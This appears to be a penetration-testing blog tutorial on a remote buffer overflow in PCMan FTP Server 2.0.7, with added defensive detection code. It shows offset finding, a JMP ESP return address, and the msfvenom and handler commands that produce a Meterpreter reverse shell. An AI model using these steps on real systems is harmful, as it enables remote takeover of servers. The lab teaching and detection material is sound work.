PCMan FTP Server 2.0.7 – Remote Buffer Overflow POC

Greetings! In this article I would like to present the exploitation of a vulnerable FTP server through a buffer overflow. The main audience will be penetration testers, security analysts and security enthusiasts. I am not an expert, but I am sure that if you follow what is in here, it will get you going. Have fun reading it. Here is the path we will cover in this article: 

  1. A little introduction 
  2. Lab setup 
  3. Steps to conduct a Buffer Overflow on PCMan FTP Server 2.0.7
  4. Practice machines 

Introduction: I expect you know these things, but let’s revise it formally once 😉 

  • PCMan FTP Server: PCMan's FTP Server is free software mainly designed for beginners not familiar with computers, with the aim of making it easy to set up a basic FTP server. 
  • Buffer Overflow: In the simplest terms, a buffer overflow occurs when a program writes more data into a buffer than the buffer can hold, overwriting adjacent memory. This can cause the program to crash or, if the overwritten memory includes control data such as a saved return address, to execute arbitrary code. 
  • Nmap: An open-source CLI tool used in pen-testing engagements for enumeration: finding open ports, the services running on them and their versions. 
  • Metasploit Framework: A well-known penetration-testing framework for developing and executing exploits and obtaining remote code execution (RCE). 
  • Msfvenom: The Metasploit tool for generating and encoding payloads. 
  • Immunity Debugger: A binary code analysis tool developed by Immunity Inc. It is based on the popular OllyDbg, but adds support for Python scripts to automate repetitive jobs. 

Lab Setup: 

There are alternatives to this lab, but this is what I used while performing the attack. Installation of these tools is not covered in this post to keep it from getting too long. Kindly ensure you have the following installed and set up before we move on to the main thing! 

Note: Install Kali Linux and Windows 7/8/8.1 in VirtualBox. On the Windows 7 simulation machine, install Immunity Debugger and the vulnerable PCMan FTP server. 

Steps to conduct a Buffer Overflow on PCMan FTP Server 2.0.7 

Enumeration with nmap: 

First off, I installed the PCMan program on my Windows 7 machine from https://www.exploit-db.com/exploits/26471. Start the service as an administrator. Depending on your version of Windows, you may also have to turn off the firewall. Also start Immunity Debugger and open the FTP server in it. 

The nmap scan against the target machine showed the following output: 

[Screenshot: nmap scan output against the Windows 7 machine]

To double-check that it was working, I made a quick netcat connection to it using the command: 

nc 192.168.1.8 21 

Note:  

  • The version is PCMan's FTP Server 2.0.7, which is vulnerable to a buffer overflow attack. 
  • The Windows 7 simulation machine's IP is 192.168.1.8, so change it to match yours. 
  • All of the operating systems listed in nmap's OS details section are affected in the same way, so you can install any one of them and perform the exploitation. 

Crashing the server: 

I tried to overflow the PUT buffer several times and got the closest hit at 2100 A's, as shown in the script in the screenshot below; its effect can be seen on our simulation machine. 

[Screenshot: the Python script sending 2100 A's to the PUT command]
  • Note how Immunity Debugger on the simulation machine shows the FTP server crashing when this long string of A's is sent. 
[Screenshot: Immunity Debugger after the overflow (buffer_overflowed.PNG)]
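The same event seen from the defender's side: the example below is added to this article (it is not the author's script and not part of PCMan) and inspects FTP control-channel command lines the way a proxy or IDS would hold them, flagging arguments that are far longer than any legitimate path, consist of one repeated byte, or contain non-printable bytes. The sample session, the thresholds MAX_ARG_LEN and MAX_REPEAT_RUN, and the function names are all constructed assumptions; tune the thresholds to the longest paths your own server really serves.

```python
import re

# Constructed sample of FTP control-channel lines, as a proxy or IDS would log them.
# Not captured from the author's lab.
SAMPLE_SESSION = [
    b"USER anonymous",
    b"PASS guest@example.com",
    b"CWD /pub",
    b"PUT " + b"A" * 2100,        # the oversized argument the article crashes the server with
    b"STOR report.txt",
    b"RETR " + b"\x90" * 40,      # constructed: non-printable bytes where a filename belongs
]

MAX_ARG_LEN = 256      # assumption: longer than any legitimate path on this server
MAX_REPEAT_RUN = 64    # assumption: a run of one byte this long never occurs in a real path


def inspect_ftp_command(line: bytes) -> list:
    """Return the reasons (possibly none) why this command line looks like an overflow attempt."""
    reasons = []
    verb, _, arg = line.partition(b" ")
    if len(arg) > MAX_ARG_LEN:
        reasons.append("%s argument is %d bytes (limit %d)"
                       % (verb.decode(errors="replace"), len(arg), MAX_ARG_LEN))
    # (.)\1{N-1,} matches one byte repeated at least N times in a row.
    if re.search(rb"(.)\1{%d,}" % (MAX_REPEAT_RUN - 1), arg, re.DOTALL):
        reasons.append("argument contains a long run of a single repeated byte")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("argument contains non-printable bytes")
    return reasons


def scan_session(lines) -> list:
    """Return (index, truncated line, reasons) for every flagged command in a session."""
    findings = []
    for index, line in enumerate(lines):
        reasons = inspect_ftp_command(line)
        if reasons:
            findings.append((index, line[:40], reasons))
    return findings


if __name__ == "__main__":
    for index, snippet, reasons in scan_session(SAMPLE_SESSION):
        print("line %d: %r" % (index, snippet))
        for reason in reasons:
            print("    - " + reason)
```

Run against the sample session, only the 2100-byte PUT (length and repeated-byte rules) and the RETR with non-printable bytes are reported; the ordinary USER, PASS, CWD and STOR lines pass. A length rule alone is enough to catch the crash in this article, but the repeated-byte and non-printable checks also catch the shorter padded-and-encoded variants of the same input.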

Finding the offset 

Perform the same procedure as before, i.e. 

  • Restart the Immunity debugger  
  • Open the PCman application in Immunity 

To find the exact number of bytes needed to reach EIP, I used a script in Kali called pattern_create.rb, as shown, which creates a unique pattern of 2100 alphanumeric characters. 

[Screenshot: pattern_create.rb generating a 2100-byte pattern]

After replacing the A's with the newly created pattern, our script looked like this: 

[Screenshot: the script with the pattern in place of the A's]

The output looks like this: 

[Screenshot: Immunity Debugger showing the EIP value after the crash (searching_for_pattern.PNG)]

To find where in the pattern the four bytes now in EIP came from, I used another script called pattern_offset.rb, which reports the exact offset as shown below: 

[Screenshot: pattern_offset.rb output]

So, the offset value is 2007.  
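To make clear what pattern_create.rb and pattern_offset.rb actually compute, here is a small re-implementation added to this article; it is neither the author's script nor Metasploit's own code. It uses the same upper/lower/digit triplet scheme, so every 4-byte window of the pattern is unique, and pattern_offset reverses the byte order of the EIP value because x86 stores the four bytes little-endian in memory. simulate_saved_eip is a constructed stand-in for reading EIP off the debugger after a crash at offset 2007; no server is involved.

```python
import string
import struct

# Metasploit-style cyclic pattern: "Aa0Aa1Aa2...". Every 4-byte window is unique
# within the first 26*26*10*3 = 20280 bytes, which is what makes the offset lookup work.
def pattern_create(length: int) -> bytes:
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern limit of 20280 bytes exceeded")


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    # The debugger shows EIP as one 32-bit number. The four bytes that were copied
    # into it sat in memory in little-endian order, so pack the number back the same way.
    needle = struct.pack("<I", eip_value)
    index = pattern.find(needle)
    if index < 0:
        raise ValueError("EIP value not found in pattern")
    return index


def simulate_saved_eip(pattern: bytes, offset: int) -> int:
    # Constructed stand-in for the crash: the value EIP would hold if the saved return
    # address were overwritten by the four pattern bytes starting at `offset`.
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


if __name__ == "__main__":
    pattern = pattern_create(2100)
    crash_eip = simulate_saved_eip(pattern, 2007)
    print("EIP as the debugger would show it: %08X" % crash_eip)
    print("offset:", pattern_offset(pattern, crash_eip))
```

With a 2100-byte pattern, a crash at offset 2007 lands on the bytes "Co9C", which the debugger displays as 43396F43; feeding that number back to pattern_offset returns 2007, matching the article's result. Because the lookup relies on 4-byte windows being unique, a pattern longer than 20280 bytes would need a different alphabet.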

Remake the script as shown below: 

Controlling the EIP 

Perform the same procedure again, i.e. 

  • Restart the Immunity debugger  
  • Open the PCman application in Immunity 
[Screenshot: the script with 2007 A's followed by BBBB]

Here we supplied exactly 2007 A's into the buffer, followed by "BBBB". To confirm the offset, we watch the behaviour of EIP in Immunity Debugger on the simulation machine (Windows 7). 

[Screenshot: Immunity Debugger with EIP holding 42424242 (padding_check.PNG)]

Notice the EIP: it is 42424242, which is "BBBB", so we control it. That means we can now point EIP at an instruction inside a loaded DLL and from there execute arbitrary shellcode. 

To do so, I would use mona.py in Immunity Debugger. 

JMP ESP 

You may install it from here: 

https://github.com/corelan/mona

Extract the zip file and paste mona.py into C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands 

mona searches memory for the opcode bytes of the JMP ESP instruction, so we first need them in hex; we use Metasploit's nasm_shell for that, as shown: 

[Screenshot: nasm_shell assembling JMP ESP]

So we got our value for JMP ESP, which is "\xFF\xE4" in hex. 

Perform the following command in Immunity Debugger, as shown below: 

[Screenshot: mona.py search output (mona.PNG)]

Copy the address "76693165" and recreate the Python script in Kali Linux as shown: 

[Screenshot: the script with the JMP ESP address in place of BBBB]

It is very important to note that the copied address has to be written into the script in little-endian byte order, as highlighted in the EIP region of the screenshot. The variable named pcman, which may have confused you, holds the payload; it is generated in the next step: 

Generating the shellcode with msfvenom 

[Screenshot: msfvenom generating the payload]

The command for your reference is: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1377 -n 10 -f python -v pcman LPORT=1377 -e x86/shikata_ga_nai --platform windows --arch x86 -b '\x00\x0d\x0a\x20' 

  • The -b parameter tells the encoder to avoid the listed bad characters. That is the easy way to handle them; there is a complete methodology for finding and eliminating bad characters which is not covered here. 

Enjoying the RCE 

Now for the last step: run msfconsole, set the payload to windows/meterpreter/reverse_tcp, and start the handler: 

use exploit/multi/handler 

set LHOST 192.168.1.7 

set LPORT 1377 

exploit 

On the other side, run poc4.py from Kali. You no longer need Immunity Debugger at this point, but make sure the FTP server is running. 

Check that you got a reverse connection, as I did here: 

[Screenshot: Meterpreter session opened in msfconsole]

In this way, PCMan FTP Server 2.0.7 can be exploited by overflowing the argument of the PUT command, giving remote code execution. 

Practice Machines: 

After you are done practicing on PCMan FTP Server, you can exploit the following machines in the same way for further practice: 

Post By Jeevan Singh Bhasin